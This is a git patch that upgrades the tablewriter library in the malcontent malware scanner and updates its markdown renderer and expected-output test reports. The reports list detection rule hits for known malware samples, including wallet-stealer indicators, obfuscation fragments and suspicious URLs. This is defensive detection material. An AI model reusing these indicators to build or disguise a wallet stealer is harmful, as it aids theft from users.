From d9bc5bd7b46d395c62e6ba4d09c6e9fe1d2f0973 Mon Sep 17 00:00:00 2001
From: egibs <20933572+egibs@users.noreply.github.com>
Date: Thu, 29 May 2025 08:04:54 -0500
Subject: [PATCH 1/4] Migrate tablewriter from 0.0.5 to 1.0.7

Signed-off-by: egibs <20933572+egibs@users.noreply.github.com>
---
 go.mod                                            |  4 +++-
 go.sum                                            |  9 ++++++---
 pkg/render/markdown.go                            | 15 +++++++++------
 .../2024.lottie-player/lottie-player.min.js.mdiff |  4 ++--
 tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md |  2 +-
 tests/linux/2023.ConnectBack/tiny.md              |  2 +-
 tests/linux/2024.Darkcracks/darkcracks.sh.md      |  2 +-
 tests/linux/UPX/06ed158.md                        |  2 +-
 tests/linux/clean/code-oss.md                     |  2 +-
 tests/linux/clean/cpack.md                        |  2 +-
 tests/linux/clean/ls.x86_64.md                    |  2 +-
 tests/linux/clean/lslogins.md                     |  2 +-
 tests/linux/clean/pandoc.md                       |  2 +-
 tests/linux/clean/ping.x86_64.md                  |  2 +-
 tests/linux/clean/qemu-system-xtensa.md           |  2 +-
 tests/linux/clean/redis-server.aarch64.md         |  2 +-
 tests/linux/clean/slack.md                        |  2 +-
 tests/linux/clean/tree-sitter.md                  |  2 +-
 tests/linux/clean/trufflehog.md                   |  2 +-
 tests/linux/clean/viewgam.md                      |  2 +-
 tests/linux/clean/zipdetails.md                   |  2 +-
 .../2023.3CX/libffmpeg.change_decrease.mdiff      |  2 +-
 .../2023.3CX/libffmpeg.change_increase.mdiff      |  2 +-
 .../2023.3CX/libffmpeg.change_unrelated.mdiff     |  4 ++--
 tests/macOS/2023.3CX/libffmpeg.dirty.mdiff        |  2 +-
 tests/macOS/2023.3CX/libffmpeg.increase.mdiff     |  2 +-
 .../2023.3CX/libffmpeg.increase_unrelated.mdiff   |  4 ++--
 .../SpectralBlur-macshare.md                      |  2 +-
 tests/macOS/clean/ls.mdiff                        |  4 ++--
 tests/windows/2024.Sharp/sharpil_RAT.exe.md       |  2 +-
 tests/windows/2024.aspdasdksa2/Nil.exe.md         |  2 +-
 31 files changed, 50 insertions(+), 42 deletions(-)

diff --git a/go.mod b/go.mod
index e84d6cf6c..3f4d4f466 100644
--- a/go.mod
+++ b/go.mod
@@ -21,7 +21,7 @@ require (
 	github.com/google/go-containerregistry v0.20.5
 	github.com/klauspost/compress v1.18.0
 	github.com/klauspost/pgzip v1.2.6
-	github.com/olekukonko/tablewriter v0.0.5
+	github.com/olekukonko/tablewriter v1.0.7
 	github.com/shirou/gopsutil/v4 v4.25.4
 	github.com/ulikunitz/xz v0.5.12
 	github.com/urfave/cli/v2 v2.27.6
@@ -59,6 +59,8 @@ require (
 	github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 // indirect
 	github.com/muesli/cancelreader v0.2.2 // indirect
 	github.com/muesli/termenv v0.16.0 // indirect
+	github.com/olekukonko/errors v0.0.0-20250405072817-4e6d85265da6 // indirect
+	github.com/olekukonko/ll v0.0.8 // indirect
 	github.com/opencontainers/go-digest v1.0.0 // indirect
 	github.com/opencontainers/image-spec v1.1.1 // indirect
 	github.com/pkg/errors v0.9.1 // indirect
diff --git a/go.sum b/go.sum
index a681dcfc1..cd3ef7637 100644
--- a/go.sum
+++ b/go.sum
@@ -82,7 +82,6 @@ github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWE
 github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
 github.com/mattn/go-localereader v0.0.1 h1:ygSAOl7ZXTx4RdPYinUpg6W99U8jWvWi9Ye2JC/oIi4=
 github.com/mattn/go-localereader v0.0.1/go.mod h1:8fBrzywKY7BI3czFoHkuzRoWE9C+EiG4R1k4Cjx5p88=
-github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
 github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc=
 github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
 github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y=
@@ -93,8 +92,12 @@ github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELU
 github.com/muesli/cancelreader v0.2.2/go.mod h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo=
 github.com/muesli/termenv v0.16.0 h1:S5AlUN9dENB57rsbnkPyfdGuWIlkmzJjbFf0Tf5FWUc=
 github.com/muesli/termenv v0.16.0/go.mod h1:ZRfOIKPFDYQoDFF4Olj7/QJbW60Ol/kL1pU3VfY/Cnk=
-github.com/olekukonko/tablewriter v0.0.5 h1:P2Ga83D34wi1o9J6Wh1mRuqd4mF/x/lgBS7N7AbDhec=
-github.com/olekukonko/tablewriter v0.0.5/go.mod h1:hPp6KlRPjbx+hW8ykQs1w3UBbZlj6HuIJcUGPhkA7kY=
+github.com/olekukonko/errors v0.0.0-20250405072817-4e6d85265da6 h1:r3FaAI0NZK3hSmtTDrBVREhKULp8oUeqLT5Eyl2mSPo=
+github.com/olekukonko/errors v0.0.0-20250405072817-4e6d85265da6/go.mod h1:ppzxA5jBKcO1vIpCXQ9ZqgDh8iwODz6OXIGKU8r5m4Y=
+github.com/olekukonko/ll v0.0.8 h1:sbGZ1Fx4QxJXEqL/6IG8GEFnYojUSQ45dJVwN2FH2fc=
+github.com/olekukonko/ll v0.0.8/go.mod h1:En+sEW0JNETl26+K8eZ6/W4UQ7CYSrrgg/EdIYT2H8g=
+github.com/olekukonko/tablewriter v1.0.7 h1:HCC2e3MM+2g72M81ZcJU11uciw6z/p82aEnm4/ySDGw=
+github.com/olekukonko/tablewriter v1.0.7/go.mod h1:H428M+HzoUXC6JU2Abj9IT9ooRmdq9CxuDmKMtrOCMs=
 github.com/opencontainers/go-digest v1.0.0 h1:apOUWs51W5PlhuyGyz9FCeeBIOUDA/6nW8Oi/yOhh5U=
 github.com/opencontainers/go-digest v1.0.0/go.mod h1:0JzlMkj0TRzQZfJkVvzbP0HBR3IKzErnv2BNG4W4MAM=
 github.com/opencontainers/image-spec v1.1.1 h1:y0fUlFfIZhPF1W537XOLg0/fcx6zcHCJwooC2xJA040=
diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go
index 671ccca31..d5ef5d94c 100644
--- a/pkg/render/markdown.go
+++ b/pkg/render/markdown.go
@@ -15,6 +15,8 @@ import (
 
 	"github.com/chainguard-dev/malcontent/pkg/malcontent"
 	"github.com/olekukonko/tablewriter"
+	"github.com/olekukonko/tablewriter/renderer"
+	"github.com/olekukonko/tablewriter/tw"
 )
 
 var (
@@ -252,12 +254,13 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 	}
 
 	buf := bytes.NewBuffer([]byte{})
-	table := tablewriter.NewWriter(buf)
-	table.SetAutoWrapText(false)
-	table.SetHeader([]string{"Risk", "Key", "Description", "Evidence"})
-	table.SetBorders(tablewriter.Border{Left: true, Top: false, Right: true, Bottom: false})
-	table.SetCenterSeparator("|")
-	table.AppendBulk(data) // Add Bulk Data
+	table := tablewriter.NewTable(buf,
+		tablewriter.WithRenderer(renderer.NewMarkdown()),
+		tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleDefault)}),
+		tablewriter.WithRowAutoWrap(0),
+	)
+	table.Header([]string{"Risk", "Key", "Description", "Evidence"})
+	table.Bulk(data) // Add Bulk Data
 	table.Render()
 
 	// remove excess whitespace
diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
index 1ecf42b8e..493e9d08d 100644
--- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
+++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
@@ -3,7 +3,7 @@
 ### 49 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)<br>[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)<br>[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)<br>[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)<br>[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)<br>[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)<br>[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)<br>[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)<br>[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)<br>[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)<br>[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)<br>[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)<br>[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)<br>[BraveWallet](https://github.com/search?q=BraveWallet&type=code)<br>[Ronin](https://github.com/search?q=Ronin&type=code)<br>[http](https://github.com/search?q=http&type=code) |
 | +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function(](https://github.com/search?q=function%28&type=code)<br>[charAt(s](https://github.com/search?q=charAt%28s&type=code)<br>[charAt(a](https://github.com/search?q=charAt%28a&type=code)<br>[charAt(n](https://github.com/search?q=charAt%28n&type=code)<br>[charAt(c](https://github.com/search?q=charAt%28c&type=code)<br>[charAt(t](https://github.com/search?q=charAt%28t&type=code)<br>[charAt(u](https://github.com/search?q=charAt%28u&type=code)<br>[charAt(w](https://github.com/search?q=charAt%28w&type=code)<br>[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)<br>[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)<br>[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)<br>[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)<br>[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)<br>[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)<br>[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)<br>[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)<br>[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)<br>[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)<br>[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)<br>[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)<br>[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)<br>[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)<br>[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)<br>[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)<br>[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)<br>[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)<br>[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)<br>[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)<br>[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)<br>[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)<br>[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)<br>[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)<br>[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)<br>[p>>>18](https://github.com/search?q=p%3E%3E%3E18&type=code)<br>[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)<br>[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)<br>[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)<br>[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)<br>[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)<br>[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)<br>[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)<br>[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)<br>[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)<br>[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)<br>[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)<br>[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)<br>[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)<br>[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)<br>[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)<br>[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)<br>[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)<br>[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)<br>[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)<br>[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)<br>[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)<br>[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)<br>[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)<br>[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)<br>[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)<br>[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)<br>[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)<br>[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)<br>[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)<br>[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)<br>[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)<br>[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)<br>[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)<br>[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)<br>[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)<br>[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)<br>[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)<br>[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)<br>[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)<br>[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)<br>[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)<br>[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)<br>[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)<br>[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)<br>[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)<br>[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)<br>[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)<br>[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)<br>[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)<br>[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)<br>[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)<br>[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code)<br>[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)<br>[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)<br>[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)<br>[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)<br>[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)<br>[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)<br>[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)<br>[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)<br>[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)<br>[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)<br>[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)<br>[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)<br>[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)<br>[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)<br>[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)<br>[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)<br>[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)<br>[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)<br>[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)<br>[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)<br>[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)<br>[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)<br>[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)<br>[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)<br>[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)<br>[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)<br>[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)<br>[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)<br>[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)<br>[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)<br>[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)<br>[q>>>0](https://github.com/search?q=q%3E%3E%3E0&type=code)<br>[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)<br>[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)<br>[t>>>9](https://github.com/search?q=t%3E%3E%3E9&type=code)<br>[t>>>7](https://github.com/search?q=t%3E%3E%3E7&type=code)<br>[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)<br>[q>>>3](https://github.com/search?q=q%3E%3E%3E3&type=code)<br>[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)<br>[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)<br>[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)<br>[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)<br>[s>>>8](https://github.com/search?q=s%3E%3E%3E8&type=code)<br>[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)<br>[u>>>8](https://github.com/search?q=u%3E%3E%3E8&type=code)<br>[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)<br>[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)<br>[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)<br>[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)<br>[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)<br>[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)<br>[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)<br>[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)<br>[v>>>8](https://github.com/search?q=v%3E%3E%3E8&type=code)<br>[p>>>8](https://github.com/search?q=p%3E%3E%3E8&type=code)<br>[w>>>3](https://github.com/search?q=w%3E%3E%3E3&type=code)<br>[r>>>8](https://github.com/search?q=r%3E%3E%3E8&type=code)<br>[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)<br>[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)<br>[a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)<br>[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)<br>[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)<br>[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)<br>[t>>>0](https://github.com/search?q=t%3E%3E%3E0&type=code)<br>[r>>>0](https://github.com/search?q=r%3E%3E%3E0&type=code)<br>[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)<br>[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)<br>[s>>>0](https://github.com/search?q=s%3E%3E%3E0&type=code)<br>[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)<br>[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)<br>[z>>>0](https://github.com/search?q=z%3E%3E%3E0&type=code)<br>[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)<br>[v>>>0](https://github.com/search?q=v%3E%3E%3E0&type=code)<br>[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)<br>[p>>>0](https://github.com/search?q=p%3E%3E%3E0&type=code)<br>[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)<br>[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)<br>[p>>>7](https://github.com/search?q=p%3E%3E%3E7&type=code)<br>[s>>>6](https://github.com/search?q=s%3E%3E%3E6&type=code)<br>[x>>>9](https://github.com/search?q=x%3E%3E%3E9&type=code)<br>[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)<br>[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)<br>[w>>>7](https://github.com/search?q=w%3E%3E%3E7&type=code) |
 | +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https://api.mantlescan.xyz/)<br>[https://mantlescan.xyz/](https://mantlescan.xyz/)<br>[https://openchain.xyz/](https://openchain.xyz/) |
@@ -57,7 +57,7 @@
 ### 5 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | -MEDIUM | [anti-static/obfuscation/strtoi](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/strtoi.yara#sketchy_parseint_math) | complex math and string to integer conversion | [alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)<br>[56320+65536](https://github.com/search?q=56320%2B65536&type=code)<br>[969v6h-12](https://github.com/search?q=969v6h-12&type=code)<br>[100*this](https://github.com/search?q=100%2Athis&type=code)<br>[100*Math](https://github.com/search?q=100%2AMath&type=code)<br>[parseInt](https://github.com/search?q=parseInt&type=code)<br>[180*Math](https://github.com/search?q=180%2AMath&type=code)<br>[01*this](https://github.com/search?q=01%2Athis&type=code)<br>[i-56320](https://github.com/search?q=i-56320&type=code)<br>[r-55296](https://github.com/search?q=r-55296&type=code)<br>[01*Math](https://github.com/search?q=01%2AMath&type=code)<br>[255*G](https://github.com/search?q=255%2AG&type=code)<br>[255*e](https://github.com/search?q=255%2Ae&type=code)<br>[001*t](https://github.com/search?q=001%2At&type=code)<br>[255*t](https://github.com/search?q=255%2At&type=code)<br>[001*r](https://github.com/search?q=001%2Ar&type=code)<br>[255*j](https://github.com/search?q=255%2Aj&type=code)<br>[001-e](https://github.com/search?q=001-e&type=code)<br>[001+e](https://github.com/search?q=001%2Be&type=code)<br>[255*u](https://github.com/search?q=255%2Au&type=code)<br>[984-3](https://github.com/search?q=984-3&type=code)<br>[01*a](https://github.com/search?q=01%2Aa&type=code)<br>[01*n](https://github.com/search?q=01%2An&type=code)<br>[01+i](https://github.com/search?q=01%2Bi&type=code)<br>[10*h](https://github.com/search?q=10%2Ah&type=code)<br>[v-90](https://github.com/search?q=v-90&type=code)<br>[h+90](https://github.com/search?q=h%2B90&type=code)<br>[19*e](https://github.com/search?q=19%2Ae&type=code)<br>[12*e](https://github.com/search?q=12%2Ae&type=code) |
 | -MEDIUM | [anti-static/obfuscation/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/utf16.yara#sketchy_fromCharCode_math) | complex math and utf16 code unit conversion | [fromCharCode](https://github.com/search?q=fromCharCode&type=code)<br>[alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)<br>[56320+65536](https://github.com/search?q=56320%2B65536&type=code)<br>[969v6h-12](https://github.com/search?q=969v6h-12&type=code)<br>[100*this](https://github.com/search?q=100%2Athis&type=code)<br>[100*Math](https://github.com/search?q=100%2AMath&type=code)<br>[180*Math](https://github.com/search?q=180%2AMath&type=code)<br>[01*this](https://github.com/search?q=01%2Athis&type=code)<br>[r-55296](https://github.com/search?q=r-55296&type=code)<br>[i-56320](https://github.com/search?q=i-56320&type=code)<br>[01*Math](https://github.com/search?q=01%2AMath&type=code)<br>[984-3](https://github.com/search?q=984-3&type=code)<br>[255*e](https://github.com/search?q=255%2Ae&type=code)<br>[255*t](https://github.com/search?q=255%2At&type=code)<br>[255*j](https://github.com/search?q=255%2Aj&type=code)<br>[001*t](https://github.com/search?q=001%2At&type=code)<br>[001*r](https://github.com/search?q=001%2Ar&type=code)<br>[001-e](https://github.com/search?q=001-e&type=code)<br>[001+e](https://github.com/search?q=001%2Be&type=code)<br>[255*G](https://github.com/search?q=255%2AG&type=code)<br>[255*u](https://github.com/search?q=255%2Au&type=code)<br>[01*n](https://github.com/search?q=01%2An&type=code)<br>[01*a](https://github.com/search?q=01%2Aa&type=code)<br>[10*h](https://github.com/search?q=10%2Ah&type=code)<br>[19*e](https://github.com/search?q=19%2Ae&type=code)<br>[12*e](https://github.com/search?q=12%2Ae&type=code)<br>[v-90](https://github.com/search?q=v-90&type=code)<br>[h+90](https://github.com/search?q=h%2B90&type=code)<br>[01+i](https://github.com/search?q=01%2Bi&type=code) |
 | -MEDIUM | [data/encoding/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/url.yara#decode_uri_component) | decodes URL components | [decodeURIComponent](https://github.com/search?q=decodeURIComponent&type=code) |
diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
index 19457ba35..e2288f43d 100644
--- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
+++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
@@ -1,7 +1,7 @@
 ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
 | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
 
diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md
index 6a4a77fbf..8ea5e9d9b 100644
--- a/tests/linux/2023.ConnectBack/tiny.md
+++ b/tests/linux/2023.ConnectBack/tiny.md
@@ -1,7 +1,7 @@
 ## linux/2023.ConnectBack/tiny [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
 | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
 
diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md
index 4513a8a7a..21947b244 100644
--- a/tests/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md
@@ -1,7 +1,7 @@
 ## linux/2024.Darkcracks/darkcracks.sh [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|--|--|--|--|
+|:--:|:--:|:--:|:--:|
 | CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[cd /;](https://github.com/search?q=cd+%2F%3B&type=code) |
